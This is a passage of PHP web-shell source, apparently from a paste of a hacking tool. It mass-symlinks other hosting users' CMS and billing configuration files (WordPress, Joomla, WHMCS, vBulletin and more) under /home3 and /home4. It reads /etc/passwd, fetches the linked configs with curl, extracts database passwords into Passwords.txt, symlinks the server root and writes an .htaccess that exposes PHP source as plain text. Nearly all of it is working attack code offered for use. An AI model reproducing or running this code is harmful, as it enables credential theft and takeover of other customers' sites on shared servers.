  1934. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1935. @symlink('/home3/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1936. @symlink('/home3/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1937. @symlink('/home3/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1938. @symlink('/home3/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1939. @symlink('/home3/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1940. @symlink('/home3/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1941. @symlink('/home3/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1942. @symlink('/home3/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1943. @symlink('/home3/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1944. @symlink('/home3/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1945. @symlink('/home3/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1946. @symlink('/home3/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1947. @symlink('/home3/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1948. @symlink('/home3/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1949. @symlink('/home3/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1950. @symlink('/home3/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1951. @symlink('/home3/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1952. @symlink('/home3/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1953. @symlink('/home3/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1954. @symlink('/home3/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1955. @symlink('/home3/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1956. @symlink('/home3/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1957. @symlink('/home3/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1958. @symlink('/home3/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1959. @symlink('/home3/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1960. @symlink('/home3/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1961. @symlink('/home3/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1962. @symlink('/home3/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1963. @symlink('/home3/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1964. @symlink('/home3/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1965. @symlink('/home3/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1966. @symlink('/home3/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1967. @symlink('/home3/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1968. @symlink('/home3/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1969. @symlink('/home3/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1970. @symlink('/home3/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1971. @symlink('/home3/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1972. @symlink('/home3/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1973. @symlink('/home3/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1974. @symlink('/home3/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1975. @symlink('/home3/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1976. @symlink('/home3/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1977. @symlink('/home3/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1978. @symlink('/home3/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1979. @symlink('/home3/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1980. @symlink('/home3/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1981. @symlink('/home3/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1982. @symlink('/home3/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1983. @symlink('/home3/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1984. @symlink('/home3/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1985. @symlink('/home3/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1986.  
  1987. //Home4
  1988.  
  1989. @symlink('/home4/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1990. @symlink('/home4/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1991. @symlink('/home4/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1992. @symlink('/home4/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1993. @symlink('/home4/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1994. @symlink('/home4/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1995. @symlink('/home4/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1996. @symlink('/home4/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1997. @symlink('/home4/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1998. @symlink('/home4/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1999. @symlink('/home4/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  2000. @symlink('/home4/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  2001. @symlink('/home4/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  2002. @symlink('/home4/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  2003. @symlink('/home4/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  2004. @symlink('/home4/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  2005. @symlink('/home4/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  2006. @symlink('/home4/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  2007. @symlink('/home4/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  2008. @symlink('/home4/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  2009. @symlink('/home4/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  2010. @symlink('/home4/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  2011. @symlink('/home4/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  2012. @symlink('/home4/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  2013. @symlink('/home4/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  2014. @symlink('/home4/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  2015. @symlink('/home4/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  2016. @symlink('/home4/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  2017. @symlink('/home4/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  2018. @symlink('/home4/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  2019. @symlink('/home4/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  2020. @symlink('/home4/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  2021. @symlink('/home4/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  2022. @symlink('/home4/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  2023. @symlink('/home4/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  2024. @symlink('/home4/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  2025. @symlink('/home4/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  2026. @symlink('/home4/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  2027. @symlink('/home4/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  2028. @symlink('/home4/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  2029. @symlink('/home4/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  2030. @symlink('/home4/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  2031. @symlink('/home4/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  2032. @symlink('/home4/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  2033. @symlink('/home4/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  2034. @symlink('/home4/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  2035. @symlink('/home4/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  2036. @symlink('/home4/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  2037. @symlink('/home4/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  2038. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2039. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2040. @symlink('/home4/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  2041. @symlink('/home4/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  2042. @symlink('/home4/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  2043. @symlink('/home4/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  2044. @symlink('/home4/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  2045. @symlink('/home4/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  2046. @symlink('/home4/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  2047. @symlink('/home4/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  2048. @symlink('/home4/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  2049. @symlink('/home4/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  2050. @symlink('/home4/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  2051. @symlink('/home4/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  2052. @symlink('/home4/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  2053. @symlink('/home4/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  2054. @symlink('/home4/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  2055. @symlink('/home4/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  2056. @symlink('/home4/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  2057. @symlink('/home4/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  2058. @symlink('/home4/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  2059. @symlink('/home4/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  2060. @symlink('/home4/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  2061. @symlink('/home4/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  2062. @symlink('/home4/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  2063. @symlink('/home4/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  2064. @symlink('/home4/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  2065. @symlink('/home4/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  2066. @symlink('/home4/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  2067. @symlink('/home4/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  2068. @symlink('/home4/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  2069. @symlink('/home4/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  2070. @symlink('/home4/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  2071. @symlink('/home4/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  2072. @symlink('/home4/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  2073. @symlink('/home4/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  2074. @symlink('/home4/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  2075. @symlink('/home4/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  2076. @symlink('/home4/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  2077. @symlink('/home4/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  2078. @symlink('/home4/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  2079. @symlink('/home4/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  2080. @symlink('/home4/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  2081. @symlink('/home4/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  2082. @symlink('/home4/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  2083. @symlink('/home4/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  2084. @symlink('/home4/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  2085. @symlink('/home4/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  2086. @symlink('/home4/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  2087. @symlink('/home4/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  2088. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2089. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2090. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2091. @symlink('/home4/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  2092. @symlink('/home4/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  2093. @symlink('/home4/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  2094. @symlink('/home4/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  2095. @symlink('/home4/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  2096. @symlink('/home4/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  2097. @symlink('/home4/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  2098. @symlink('/home4/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  2099. @symlink('/home4/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  2100. @symlink('/home4/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  2101. @symlink('/home4/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  2102. @symlink('/home4/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  2103. @symlink('/home4/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  2104. @symlink('/home4/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  2105. @symlink('/home4/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  2106. @symlink('/home4/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  2107. @symlink('/home4/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  2108. @symlink('/home4/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  2109. @symlink('/home4/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  2110. @symlink('/home4/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  2111. @symlink('/home4/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  2112. @symlink('/home4/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  2113. @symlink('/home4/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  2114. @symlink('/home4/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  2115. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2116. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2117. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2118. @symlink('/home4/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  2119. @symlink('/home4/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  2120. @symlink('/home4/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  2121. @symlink('/home4/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  2122. @symlink('/home4/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  2123. @symlink('/home4/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  2124. @symlink('/home4/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  2125. @symlink('/home4/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  2126. @symlink('/home4/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  2127. @symlink('/home4/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  2128. @symlink('/home4/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  2129. @symlink('/home4/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  2130. @symlink('/home4/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  2131. @symlink('/home4/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  2132. @symlink('/home4/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  2133. @symlink('/home4/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  2134. @symlink('/home4/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  2135. @symlink('/home4/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  2136. @symlink('/home4/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  2137. @symlink('/home4/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  2138. @symlink('/home4/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  2139. @symlink('/home4/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  2140. @symlink('/home4/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  2141. @symlink('/home4/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  2142. @symlink('/home4/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  2143. @symlink('/home4/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  2144. @symlink('/home4/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  2145. @symlink('/home4/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  2146. @symlink('/home4/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  2147. @symlink('/home4/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  2148. @symlink('/home4/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  2149. @symlink('/home4/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  2150. @symlink('/home4/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  2151. @symlink('/home4/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  2152. @symlink('/home4/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  2153. @symlink('/home4/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  2154. @symlink('/home4/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  2155. @symlink('/home4/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  2156. @symlink('/home4/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  2157. @symlink('/home4/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  2158. @symlink('/home4/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  2159. @symlink('/home4/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2160. @symlink('/home4/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  2161. @symlink('/home4/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  2162. @symlink('/home4/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  2163. @symlink('/home4/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  2164. @symlink('/home4/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  2165. @symlink('/home4/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  2166. @symlink('/home4/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  2167. @symlink('/home4/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  2168. @symlink('/home4/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2169.  
  2170. }
  2171.  
  2172. //password grab
  2173.  
  2174. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
  2175. {
  2176.  
  2177. $ar0=explode($marqueurDebutLien, $text);
  2178. $ar1=explode($marqueurFinLien, $ar0[1]);
  2179. $ar=trim($ar1[0]);
  2180. return $ar;
  2181. }
  2182.  
  2183. $ffile=fopen('Passwords.txt','a+');
  2184.  
  2185.  
  2186. $r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/Symconf/";
  2187. $re=$r;
  2188. $confi=array("-Wordpress.txt","-Joomla.txt","-WHMCS.txt","-Vbulletin.txt","-Other.txt","-Zencart.txt","-Hostbills.txt","-SMF.txt","-Drupal.txt","-OsCommerce.txt","-MyBB.txt","-PHPBB.txt","-IPB.txt","-BoxBilling.txt");
  2189.  
  2190. $users=file("/etc/passwd");
  2191. foreach($users as $user)
  2192. {
  2193.  
  2194. $str=explode(":",$user);
  2195. $usersss=$str[0];
  2196. foreach($confi as $co)
  2197. {
  2198.  
  2199.  
  2200. $uurl=$re.$usersss.$co;
  2201. $uel=$uurl;
  2202.  
  2203. $ch = curl_init();
  2204.  
  2205. curl_setopt($ch, CURLOPT_URL, $uel);
  2206. curl_setopt($ch, CURLOPT_HEADER, 1);
  2207. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2208. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  2209. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
  2210. $result['EXE'] = curl_exec($ch);
  2211. curl_close($ch);
  2212. $uxl=$result['EXE'];
  2213.  
  2214.  
  2215. if($uxl && preg_match('/table_prefix/i',$uxl))
  2216. {
  2217.  
  2218. //Wordpress
  2219.  
  2220. $dbp=entre2v2($uxl,"DB_PASSWORD', '","');");
  2221. if(!empty($dbp))
  2222. $pass=$dbp."\n";
  2223. fwrite($ffile,$pass);
  2224.  
  2225. }
  2226. elseif($uxl && preg_match('/cc_encryption_hash/i',$uxl))
  2227. {
  2228.  
  2229. //WHMCS
  2230.  
  2231. $dbp=entre2v2($uxl,"db_password = '","';");
  2232. if(!empty($dbp))
  2233. $pass=$dbp."\n";
  2234. fwrite($ffile,$pass);
  2235.  
  2236. }
  2237.  
  2238.  
  2239. elseif($uxl && preg_match('/dbprefix/i',$uxl))
  2240. {
  2241.  
  2242. //Joomla
  2243.  
  2244. $db=entre2v2($uxl,"password = '","';");
  2245. if(!empty($db))
  2246. $pass=$db."\n";
  2247. fwrite($ffile,$pass);
  2248. }
  2249. elseif($uxl && preg_match('/admincpdir/i',$uxl))
  2250. {
  2251.  
  2252. //Vbulletin
  2253.  
  2254. $db=entre2v2($uxl,"password'] = '","';");
  2255. if(!empty($db))
  2256. $pass=$db."\n";
  2257. fwrite($ffile,$pass);
  2258.  
  2259. }
  2260. elseif($uxl && preg_match('/DB_DATABASE/i',$uxl))
  2261. {
  2262.  
  2263. //Other
  2264.  
  2265. $db=entre2v2($uxl,"DB_PASSWORD', '","');");
  2266. if(!empty($db))
  2267. $pass=$db."\n";
  2268. fwrite($ffile,$pass);
  2269. }
  2270. elseif($uxl && preg_match('/dbpass/i',$uxl))
  2271. {
  2272.  
  2273. //Other
  2274.  
  2275. $db=entre2v2($uxl,"dbpass = '","';");
  2276. if(!empty($db))
  2277. $pass=$db."\n";
  2278. fwrite($ffile,$pass);
  2279. }
  2280. elseif($uxl && preg_match('/dbpass/i',$uxl))
  2281. {
  2282.  
  2283. //Other
  2284.  
  2285. $db=entre2v2($uxl,"dbpass = '","';");
  2286. if(!empty($db))
  2287. $pass=$db."\n";
  2288. fwrite($ffile,$pass);
  2289.  
  2290. }
  2291. elseif($uxl && preg_match('/dbpass/i',$uxl))
  2292. {
  2293.  
  2294. //Other
  2295.  
  2296. $db=entre2v2($uxl,"dbpass = \"","\";");
  2297. if(!empty($db))
  2298. $pass=$db."\n";
  2299. fwrite($ffile,$pass);
  2300. }
  2301.  
  2302.  
  2303. }
  2304. }
  2305. echo "<center>
  2306. <a href=\"Symconf/root/\">Root Server</a>
  2307. <br><a href=\"Symconf/Passwords.txt\">Passwords</a>
  2308. <br><a href=\"Symconf/\">Configurations</a></center>";
  2309. }
  2310. else
  2311. {
  2312. echo "<center>
  2313. <form method=\"POST\">
  2314. <textarea name=\"passwd\" class='area' rows='15' cols='60'>";
  2315. $file = '/etc/passwd';
  2316. $read = @fopen($file, 'r');
  2317. if ($read){
  2318. $body = @fread($read, @filesize($file));
  2319. echo "".htmlentities($body)."";
  2320. }
  2321. elseif(!$read)
  2322. {
  2323. $read = @show_source($file) ;
  2324. }
  2325. elseif(!$read)
  2326. {
  2327. $read = @highlight_file($file);
  2328. }
  2329. elseif(!$read)
  2330. {
  2331. for($uid=0;$uid<1000;$uid++)
  2332. {
  2333. $ara = posix_getpwuid($uid);
  2334. if (!empty($ara))
  2335. {
  2336. while (list ($key, $val) = each($ara))
  2337. {
  2338. print "$val:";
  2339. }
  2340. print "\n";
  2341. }}}
  2342.  
  2343. flush();
  2344.  
  2345. echo "</textarea>
  2346. <p><input name=\"m\" size=\"80\" value=\"Start\" type=\"submit\"/></p>
  2347. </form></center>";
  2348. }
  2349. }
  2350. }
  2351. elseif($_GET['do'] == 'symlink') {
  2352. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  2353. $d0mains = @file("/etc/named.conf");
  2354. ##httaces
  2355. if($d0mains){
  2356. @mkdir("Sym",0777);
  2357. @chdir("Sym");
  2358. @exe("ln -s / root");
  2359. $file3 = 'Options Indexes FollowSymLinks
  2360. DirectoryIndex jancox.htm
  2361. AddType text/plain .php
  2362. AddHandler text/plain .php
  2363. Satisfy Any';
  2364. $fp3 = fopen('.htaccess','w');
  2365. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  2366. echo "
  2367. <table align=center border=1 style='width:60%;border-color:#333333;'>
  2368. <tr>
  2369. <td align=center><font size=2>S. No.</font></td>
  2370. <td align=center><font size=2>Domains</font></td>
  2371. <td align=center><font size=2>Users</font></td>
  2372. <td align=center><font size=2>Symlink</font></td>
  2373. </tr>";
  2374. $dcount = 1;
  2375. foreach($d0mains as $d0main){
  2376. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  2377. flush();
  2378. if(strlen(trim($domains[1][0])) > 2){
  2379. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  2380. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  2381. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  2382. <td>".$user['name']."</td>
